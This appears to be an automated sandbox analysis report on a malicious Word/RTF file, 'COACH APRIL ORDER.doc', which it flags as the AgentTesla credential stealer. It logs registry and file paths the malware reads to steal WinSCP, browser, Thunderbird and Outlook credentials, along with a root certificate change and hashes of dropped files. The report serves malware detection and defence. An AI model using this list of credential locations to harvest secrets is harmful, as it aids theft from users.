Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Code function: 24_2_005A2DA1 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

24_2_005A2DA1

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Adds / modifies Windows certificates

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0000001E.00000002.605252143.0000000020D26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.637446295.0000000020CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 4024, type: MEMORYSTR

Searches for Windows Mail specific files

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Program Files (x86)\Windows Mail wab.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Program Files (x86)\Windows Mail wab.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Program Files (x86)\Windows Mail *
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Directory queried: C:\Program Files (x86)\Windows Mail NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Directory queried: C:\Program Files (x86)\Windows Mail wab.exe	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Directory queried: C:\Program Files (x86)\Windows Mail wab.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Directory queried: C:\Program Files (x86)\Windows Mail wab.exe

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Yara detected Credential Stealer

Source: Yara match	File source: 0000001E.00000002.605252143.0000000020D26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.637446295.0000000020CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 4024, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0000001E.00000002.605252143.0000000020D26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.562554109.0000000020E9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.637446295.0000000020CA3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 4024, type: MEMORYSTR

Windows Analysis Report
COACH APRIL ORDER.doc

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1427895
Product:	CloudBasic
Start time:	10:19:52
Start date:	18.04.2024
Sample:	COACH APRIL ORDER.doc
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	e639a26040e4180f739ee0cd78f65c64
SHA1:	7f7aee13556a622d65bf1a2387bb74b9e728430b
SHA256:	b31ab1aa44953eb1e2371a7c4750ab24ac44497ee45244f7fe5940d9280f0ab5
Filetype:	Rich Text Format (5005/1) 55.56%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D	Certificate, Version=3	0CD2F9E0DA1773E9ED864DA5E370E74E	CABD2A79A1076A31F21D253635CB039D4329A5E8	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	29F65BA8E88C063813CC50A4EA544E93	05A7040D5C127E68C25D81CC51271FFB8BEF3568	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D	data	C2217739E098009167E35A53CC874743	6E32E9A155A4ABC10200E2740D75A3B9F36786FC	9F5E49D06778075A87FAE0C763D933629BB5C83AB7996FF1D893576E075387BF
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	EDC82A14F41092A5EE32E7C242DD23ED	CCAAA37CA77842966C267BF051E3752ED95CE2D4	7E1797DC5F907826F5EDFA7CF66232217AFEC2B740EB27D9C301B8DB3E71B88F
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	91D4881F2C812CF8EE07110B290FD7A6	0CA688FDC673D0F644EB20B94760B28FF9D79812	3840970DE2FCD631782AE143948A2242742D3228F3C07DF8BEC14D12B42AF35B
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Transfusionist[1].vbs	ASCII text, with CRLF line terminators	03E2A0C33E613D9AABF9167BD28CF3C7	E7BFDE31A95148DC223347DF2ED2EA436D4BE041	F77B953A53A607E534572EDA08DFAA91AD61F52491E9982A0790869C80A714C4
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BAE8192A-6630-4741-A150-6D87257E3C2A}.tmp	data	CE338FE6899778AACFC28414F2D9498B	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{27099B88-2DF0-47DA-B344-2C89EF146D55}.tmp	data	5D4D94EE7E06BBB0AF9584119797B23A	DBB111419C704F116EFA8E72471DD83E86E49677	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D544EEE9-860F-4EF4-8E01-7FCFBCE4BC5F}.tmp	data	5A4E3A0C8AFAB98DACD2A6C4FB36F64F	CC548FAF2283BFB44CD57B09E40C3766B2BB5CA6	DDE41BD943F54CEDDCF694BC32BC4403595B21E8FB49A317CEC9A21FAEEAFCA3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E6255349-99A7-440E-AF85-C8E952BD7749}.tmp	data	8AFA5DD4B7D42F60A9B6F03261902D5E	D37D68F5DED0F448437C313CE61F10431EFD52ED	7F1C80D7422444D6E550D0A63D71F28F0E0AB2D9AA57A18C7C3263738F540D6F
C:\Users\user\AppData\Local\Temp\0qftg2pb.31p.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\Cab2DE.tmp	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	29F65BA8E88C063813CC50A4EA544E93	05A7040D5C127E68C25D81CC51271FFB8BEF3568	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
C:\Users\user\AppData\Local\Temp\Tar2DF.tmp	data	435A9AC180383F9FA094131B173A2F7B	76944EA657A9DB94F9A4BEF38F88C46ED4166983	67DC37ED50B8E63272B49A254A6039EE225974F1D767BB83EB1FD80E759A7C34
C:\Users\user\AppData\Local\Temp\bve5hkdf.4i5.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\ctlc4115.0m1.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\cu1x2255.20q.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\ddomqeod.oea.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\gkt1gi3t.lbv.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\ixm51znl.3iw.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\jpi14fil.h0z.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\l15pxfut.0ox.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\ubbt1fvl.to0.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\wygvfdy1.g2l.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\zillx4l2.uhl.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	PE32 executable (GUI) Intel 80386, for MS Windows	EF162817C730DB9355F6C28F2445D206	CD8DC9ECE1CD52447921AFA483C81617B021ECB3	84AC974BF163A6EB540744435FD65ADC951ECF1BFF77DBA7D2B5D9F389E1DAD7
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\COACH APRIL ORDER.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Thu Apr 18 07:20:36 2024, length=335127, window=hide	03738CFDE49E600340D6F50E089F4F0D	DC12969F848AB83DE305DC5A64D3E7A7A0CC5BFA	13D8BA72807A0F51FC1F5310DF8C9730EB9EC9BD7A72BBEAE01572C33545B5EA
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	Generic INItialization configuration [folders]	96EAD7052600397BCC05D106EFC5660D	D588F5FC46DFCBE9594DD997847B69AFC85C02A5	56F149FF3511A6C47296E9808CCF9AA43A9C595F349E48FE3F0044CE011489F0
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	data	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED	95E13378EA9CACA068B2687F01E9EF13F56627C2	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3UL67LTYLT60TG6C8RM3.temp	data	93430E8616F0B070C9AD96512A42E915	D9BE13DA590762A79C2D0F72D8F0ED485B4A1AA7	DEC7A885CA65F97154EB79F6B7E2FF13976D3C480D1F371A11F9E64CB0F13D9D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VW7U4BYAB455RHPEPV6J.temp	data	93430E8616F0B070C9AD96512A42E915	D9BE13DA590762A79C2D0F72D8F0ED485B4A1AA7	DEC7A885CA65F97154EB79F6B7E2FF13976D3C480D1F371A11F9E64CB0F13D9D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)	data	93430E8616F0B070C9AD96512A42E915	D9BE13DA590762A79C2D0F72D8F0ED485B4A1AA7	DEC7A885CA65F97154EB79F6B7E2FF13976D3C480D1F371A11F9E64CB0F13D9D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3d145b.TMP (copy)	data	93430E8616F0B070C9AD96512A42E915	D9BE13DA590762A79C2D0F72D8F0ED485B4A1AA7	DEC7A885CA65F97154EB79F6B7E2FF13976D3C480D1F371A11F9E64CB0F13D9D
C:\Users\user\AppData\Roaming\dialogistic.Hed	ASCII text, with very long lines (65536), with no line terminators	4E917C8B24682066DBE80531CC828FFE	53E995A4FFD2402FA68427B3211C4FC8C46D3758	3A32C9525D52C652A0AAF77FA5CD1E47EF536A11C0F65EA33F961AB25C55764C
C:\Users\user\AppData\Roaming\magicremoihohj75.vbs	ASCII text, with CRLF line terminators	03E2A0C33E613D9AABF9167BD28CF3C7	E7BFDE31A95148DC223347DF2ED2EA436D4BE041	F77B953A53A607E534572EDA08DFAA91AD61F52491E9982A0790869C80A714C4
C:\Users\user\Desktop\~$ACH APRIL ORDER.doc	data	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED	95E13378EA9CACA068B2687F01E9EF13F56627C2	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1

Windows Analysis Report COACH APRIL ORDER.doc

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
COACH APRIL ORDER.doc

Malware Threat Intel
Provided by